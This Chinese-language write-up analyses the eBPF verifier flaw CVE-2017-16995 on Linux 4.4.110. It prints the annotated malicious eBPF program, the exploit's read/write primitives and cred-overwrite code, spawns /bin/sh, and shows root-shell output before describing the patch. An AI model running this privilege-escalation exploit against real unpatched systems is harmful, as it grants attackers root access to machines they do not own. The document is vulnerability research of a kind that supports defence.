prog一共有41条指令,脚本对指令[10],[18],[26]的指令类型无法识别,结合exp及其他博客对少数指令进行了修正:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
[0]: ALU_MOV_K(BPF_REG_9, BPF_REG_0, 0x0, 0xffffffff)
[1]: JMP_JNE_K(BPF_REG_9, BPF_REG_0, 0x2, 0xffffffff)
[2]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[3]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[4]: LD_MAP_FD(BPF_REG_9, map_addr)
[5]: bpf_map_padding
[6]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0)
[7]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0)
[8]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc)
[9]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x0)
[10]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem)
[11]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0)
[12]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[13]: LDX_MEM_DW(BPF_REG_6, BPF_REG_0, 0x0, 0x0)
[14]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0)
[15]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0)
[16]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc)
[17]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x1)
[18]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem)
[19]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0)
[20]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[21]: LDX_MEM_DW(BPF_REG_7, BPF_REG_0, 0x0, 0x0)
[22]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0)
[23]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0)
[24]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc)
[25]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x2)
[26]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem)
[27]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0)
[28]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[29]: LDX_MEM_DW(BPF_REG_8, BPF_REG_0, 0x0, 0x0)
[30]: ALU64_MOV_X(BPF_REG_2, BPF_REG_0, 0x0, 0x0)
[31]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[32]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x3, 0x0)
[33]: LDX_MEM_DW(BPF_REG_3, BPF_REG_7, 0x0, 0x0)
[34]: STX_MEM_DW(BPF_REG_2, BPF_REG_3, 0x0, 0x0)
[35]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[36]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x2, 0x1)
[37]: STX_MEM_DW(BPF_REG_2, BPF_REG_10, 0x0, 0x0)
[38]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[39]: STX_MEM_DW(BPF_REG_7, BPF_REG_8, 0x0, 0x0)
[40]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)

指令执行过程

绕过check

分析指令[0]~[3]:指令[0]将r9赋值为0xffffffff;指令[1]为条件跳转指令,当r9 == 0xffffffff时继续执行下一条指令,当r9 != 0xffffffff时跳转到指令[4]去执行。在模拟执行时,r9寄存器在指令[0]处被赋值为0xffffffff,do_check认为r9恒等于0xffffffff,就不会去检查指令[4]以及后面的指令,而是继续模拟执行指令[2];指令[2]将r0赋值为0,指令[3]是BPF_EXIT指令,此时临时栈中也没有其他分支,do_check检查结束,也就是说do_check实际上只检查了4条指令。但是在真正执行时,目的寄存器DST的类型为u64,值是0x00000000ffffffff;IMM的类型为s32,值为0xffffffff,与DST比较时先被符号扩展为0xffffffffffffffff,再被当作64位无符号整数0xffffffffffffffff参与比较,从而导致DST != IMM,跳转条件成立,跳转到指令[4]去执行。

1
2
3
4
[0]: ALU_MOV_K(BPF_REG_9, BPF_REG_0, 0x0, 0xffffffff)
[1]: JMP_JNE_K(BPF_REG_9, BPF_REG_0, 0x2, 0xffffffff)
[2]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[3]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)

我们可以看到真正执行时DST和IMM的值:在函数__bpf_prog_run中下断点,程序执行至DST与IMM的比较处,此时rbx指向的就是我们的指令[1],由此可以判断rdx是由指令movsxd rdx, dword ptr [rbx + 4]得到的。movsxd为符号扩展传送指令,它将s32类型的IMM符号扩展为64位,因此IMM也就是rdx的值变为0xffffffffffffffff:
1
那另外一个就是DST的值,DST的值是0x00000000ffffffff,DST不等于IMM,然后程序从本条指令中获取到off,跳转至指令[4]去执行。
2

获取map地址

根据前面对replace_map_fd_with_map_ptr函数的分析,可以知道指令[4]会将bpf_map的地址赋值给r9;指令[5]全为0,它只是LD_MAP_FD(即BPF_LD | BPF_IMM | BPF_DW,占用两条指令的位置)的后半部分,是为了符合LD_MAP_FD对下一条指令的要求。

1
2
[4]: LD_MAP_FD(BPF_REG_9, map_addr) //r9 = map_addr
[5]: bpf_map_padding

获取map[0] ~ map[2]

获取map[0],存储在r6中:

1
2
3
4
5
6
7
8
[6]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0)   //r1 = r9,即r1 = map_addr
[7]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0) //r2 = r10 = rbp
[8]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc) //r2 = r2 + 0xfffffffc,即r2 = r2 - 4 = rbp - 4
[9]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x0) //*(u32 *)(rbp - 4) = 0,ST_MEM存入的是立即数,即key = 0
[10]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem) //call
[11]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0) //if(r0 != 0): 函数bpf_lookup_elem成功执行,跳转到指令[13]处执行,否则exit(0)
[12]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit(0)
[13]: LDX_MEM_DW(BPF_REG_6, BPF_REG_0, 0x0, 0x0) //r6 = [r0] = map[0]

获取map[1],存储在r7中:

1
2
3
4
5
6
7
8
[14]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0)            //r1 = r9
[15]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0) //r2 = r10 = rbp
[16]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc) //r2 = rbp - 4
[17]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x1) //*(u32 *)(rbp - 4) = 1,ST_MEM存入的是立即数,即key = 1
[18]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem)
[19]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0) //if(r0 != 0): 函数bpf_lookup_elem成功执行,跳转到指令[21]处执行,否则exit(0)
[20]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit(0)
[21]: LDX_MEM_DW(BPF_REG_7, BPF_REG_0, 0x0, 0x0) //r7 = [r0] = map[1]

获取map[2],存储在r8中:

1
2
3
4
5
6
7
8
[22]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0)           //r1 = r9
[23]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0) //r2 = r10 = rbp
[24]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc) //r2 = rbp - 4
[25]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x2) //*(u32 *)(rbp - 4) = 2,ST_MEM存入的是立即数,即key = 2
[26]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem)
[27]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0) //if(r0 != 0): 函数bpf_lookup_elem成功执行,跳转到指令[29]处执行,否则exit(0)
[28]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit(0)
[29]: LDX_MEM_DW(BPF_REG_8, BPF_REG_0, 0x0, 0x0) //r8 = [r0] = map[2]

任意地址读写

指令[30]~指令[40]由map[0]的值的不同导致以下情况:

  1. 如果r6等于0即map[0] == 0,r3 = [map[1]];map[2] = r3;即读取map[1]所指向地址处的8字节并写入map[2]。由于map[1]可控,因此可以进行任意地址读:将想要泄露的地址写入map[1]中,再读取map[2]的值进行泄露。
  2. 如果r6等于1即map[0] == 1,map[2] = rbp;将rbp写入map[2]中,可以利用map[2]来泄露栈地址。
  3. 如果r6既不等于0也不等于1(exp中取map[0] == 2),将map[2]的值写入map[1]指向的地址中,由于map[2]和map[1]我们都可控,可以利用这一分支进行任意地址写。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    [30]: ALU64_MOV_X(BPF_REG_2, BPF_REG_0, 0x0, 0x0)           //r2 = r0,即map[2]元素的地址(指令[26]处map_lookup_elem的返回值)
    [31]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //r0 = 0
    [32]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x3, 0x0) //if(r6 != 0): 跳转到指令[36]处执行,否则继续执行下一条指令
    [33]: LDX_MEM_DW(BPF_REG_3, BPF_REG_7, 0x0, 0x0) //r3 = [r7]
    [34]: STX_MEM_DW(BPF_REG_2, BPF_REG_3, 0x0, 0x0) //[r2] = r3
    [35]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit(0)
    [36]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x2, 0x1) //if(r6 != 1):跳转到指令[39]处执行,否则继续执行下一条指令
    [37]: STX_MEM_DW(BPF_REG_2, BPF_REG_10, 0x0, 0x0) //[r2] = r10 = rbp
    [38]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit(0)
    [39]: STX_MEM_DW(BPF_REG_7, BPF_REG_8, 0x0, 0x0) //[r7] = r8
    [40]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit(0)

攻击过程

再看一下实际执行的情况,内核版本是4.4.110,直接使用了p4nda大佬编译的bzImage,文件系统随便用的某一个kernel pwn题的:

1
2
/ $ uname -a
Linux (none) 4.4.110 #1 SMP Thu Oct 11 05:33:12 PDT 2018 x86_64 GNU/Linux

exp分为两部分,一部分为准备工作,创建map,加载eBPF代码以及绑定socket,和前面的sample介绍的流程类似,这里就不再赘述,只贴一下exp的函数调用流程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
// Preparation: create the map, load the eBPF program and attach it to a socket.
// NOTE(review): every failure path below calls exit(0), so a failed setup is
// indistinguishable from success by exit status.

// Array map with 3 entries (int key, long long value).
mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);
if (mapfd < 0){
puts("mapfd create error");
exit(0);
}
puts("[+]mapfd finished");

// Load __prog (PROGSIZE bytes of instructions) as a socket-filter program, license "GPL".
progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,(struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);

if (progfd < 0)
exit(0);

puts("[+]bpf_prog_load finished");

// Pair of connected AF_UNIX datagram sockets.
if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
exit(0);

puts("[+]socketpair finished");

// Attach the loaded program to sockets[1].
if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
exit(0);

puts("[+]setsockopt finished");

在进行exploit之前,首先介绍在exp中如何进行地址泄露以及任意地址读写,与eBPF指令[30]~[40]对应。首先是任意地址泄露,条件是map[0] = 0,将目标地址写入map[1],读取map[2]进行泄露:

1
2
3
4
5
6
7
/*
 * Read primitive: returns the value that ends up in map[2] after the map is
 * set to map[0] = 0, map[1] = addr, map[2] = 0.
 * __update_elem() and get_value() are defined elsewhere in the exploit;
 * presumably they update map entries 0..2 and look up one entry.
 */
static uint64_t __read(uint64_t addr)
{
	uint64_t leaked;

	__update_elem(0, addr, 0);
	leaked = get_value(2);

	return leaked;
}

然后是任意地址写,条件是map[0]既不等于0也不等于1(exp中取2),此时map[2]的值会被写入map[1]所指向的地址中。

1
2
3
4
5
6
/*
 * Write primitive: sets map[0] = 2, map[1] = addr, map[2] = val so that the
 * value in map[2] is written to the address held in map[1].
 * __update_elem() is defined elsewhere in the exploit.
 */
static void __write(uint64_t addr, uint64_t val)
{
	__update_elem(2, addr, val);
}

还可以泄露rbp栈指针,条件是map[0] == 1,读取map[2]的值,就是rbp。

1
2
3
4
5
6
7
8
/*
 * Frame-pointer leak: with map[0] = 1, rbp is obtained from map[2].
 * __update_elem() and get_value() are defined elsewhere in the exploit.
 */
static uint64_t __get_fp(void)
{
	uint64_t fp;

	__update_elem(1, 0, 0);
	fp = get_value(2);

	return fp;
}

将rbp泄露后,由于Linux将内核态的进程堆栈和线程描述符thread_info这两个部分紧凑地存放在一个单独的区域(这块区域在32位x86上通常为两个页框即8KB,而在这里的x86_64 4.4内核上为16KB即0x4000字节),thread_info存放在这个内存区的开始,因此由rbp & ~(0x4000 - 1)即可获取thread_info的首地址,读取其前8个字节即task_struct的地址。

1
2
3
4
5
6
7
8
9
10
//https://elixir.bootlin.com/linux/v4.4.110/source/arch/x86/include/asm/thread_info.h#L55
/*
 * Per-thread descriptor.  `task` is the first member, so the pointer to the
 * owning task_struct sits at offset 0 of this structure.
 */
struct thread_info {
struct task_struct *task; /* main task structure */
__u32 flags; /* low level flags */
__u32 status; /* thread synchronous flags */
__u32 cpu; /* current CPU */
mm_segment_t addr_limit;
unsigned int sig_on_uaccess_error:1;
unsigned int uaccess_err:1; /* uaccess failed */
};

通过这张图可以清晰的看出内核栈与thread_info,task_struct的关系,图来自于《深入理解Linux内核》
3
然后通过cred的偏移获取cred结构体地址,根据uid偏移获取uid的地址,最后将其修改为0进行提权,然后get shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
// Walk from the leaked frame pointer to the uid field of the current cred,
// sanity-checking every pointer against PHYS_OFFSET before it is used.
// get_sp() is not shown here; presumably it masks fp down to the start of
// the kernel stack area where thread_info lives -- verify against the full exploit.
sp = get_sp(fp);
if(sp < PHYS_OFFSET){
puts("bogus sp");
exit(0);
}

// The value read at sp is used as the task_struct pointer.
task_struct = __read(sp);
if (task_struct < PHYS_OFFSET){
puts("bogus task ptr");
exit(0);
}

printf("[+]task_struct = %lx\n", task_struct);

credptr = __read(task_struct + CRED_OFFSET); // cred
if (credptr < PHYS_OFFSET){
puts("bogus cred ptr");
exit(0);
}

printf("[+]credptr = %lx\n", credptr);

uidptr = credptr + UID_OFFSET; // uid
if (uidptr < PHYS_OFFSET){
puts("bogus uid ptr");
exit(0);
}

printf("uidptr = %lx\n", uidptr);

__write(uidptr, 0); // set both uid and gid to 0

// Success is judged by getuid() now returning 0.
if (getuid() == 0) {
printf("spawning root shell\n");
system("id");
system("/bin/sh");
exit(0);

}
else{
puts("[-]exploit failed");
exit(0);
}

最后exp执行效果:

1
2
3
4
5
6
7
8
9
10
11
12
/ $ id
uid=1000(pwn) gid=1000 groups=1000
/ $ ./exp
[+]mapfd finished
[+]bpf_prog_load finished
[+]socketpair finished
[+]setsockopt finished
[+]task_struct = 0xffff88000dbc5300
[+]credptr = 0xffff88000d58d780
uidptr = 0xffff88000d58d784
spawning root shell
uid=0(root) gid=0 euid=1000(pwn) egid=1000 groups=1000

修复

漏洞影响版本是Linux Kernel Version 4.14-4.4 (主要影响Debian和Ubuntu发行版),在补丁中,在模拟执行的check_alu_op函数中,对于BPF_ALU64|BPF_MOV|BPF_K类型的指令操作数,将32位的立即数符号扩展为64位;对于BPF_ALU|BPF_MOV|BPF_K类型的指令操作数,0扩展至64位,与真正执行时保持一致。
4
5

参考

[exp] http://cyseclabs.com/exploits/upstream44.c
[exp] http://p4nda.top/2019/01/18/CVE-2017-16995/
[eBPF] https://www.ibm.com/developerworks/cn/linux/l-lo-eBPF-history/index.html
https://xz.aliyun.com/t/2212
http://p4nda.top/2019/01/18/CVE-2017-16995/
https://cert.360.cn/report/detail?id=ff28fc8d8cb2b72148c9237612933c11